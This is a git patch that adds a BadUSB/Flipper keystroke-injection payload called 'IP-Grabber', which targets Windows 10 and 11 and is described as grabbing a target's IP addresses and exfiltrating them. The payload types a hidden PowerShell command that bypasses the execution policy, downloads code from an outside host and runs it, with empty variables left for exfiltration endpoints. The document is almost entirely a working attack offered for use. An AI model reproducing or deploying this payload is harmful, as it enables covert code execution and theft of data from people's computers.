From fe2228901fa583163d44e02b0b0d5596fb1d44cc Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Fri, 6 Jan 2023 22:13:53 -0600 Subject: [PATCH] Create IP-Grabber.txt --- Payloads/Flip-IP-Grabber/IP-Grabber.txt | 12 ++++++++++++ 1 file changed, 12 insertions(+) create mode 100644 Payloads/Flip-IP-Grabber/IP-Grabber.txt diff --git a/Payloads/Flip-IP-Grabber/IP-Grabber.txt b/Payloads/Flip-IP-Grabber/IP-Grabber.txt new file mode 100644 index 0000000..db2868c --- /dev/null +++ b/Payloads/Flip-IP-Grabber/IP-Grabber.txt @@ -0,0 +1,12 @@ +REM Title: IP-Grabber + +REM Author: I am Jakoby + +REM Description: This payload is meant to do grab your targets IP addresses and exfil them + +REM Target: Windows 10, 11 + +GUI r +DELAY 500 +STRING powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/f0x | iex +ENTER